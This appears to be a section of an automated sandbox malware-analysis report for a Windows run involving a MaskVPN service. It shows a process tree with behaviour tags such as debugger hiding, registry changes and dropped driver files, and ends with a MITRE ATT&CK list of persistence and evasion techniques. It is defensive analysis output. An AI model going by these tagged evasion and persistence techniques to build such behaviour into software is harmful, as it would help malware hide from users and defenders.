C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"2⤵PID:5152
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6592
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:3472
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:8948
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6024
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5152 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Suspicious use of SetWindowsHookEx
PID:5176
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6132
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8384
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5132
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:7200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5204
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8612
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2416
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9132
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5004
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8004
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7468
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6404
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5876
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4644
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5300
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6260
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5888
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:8552
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6780
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1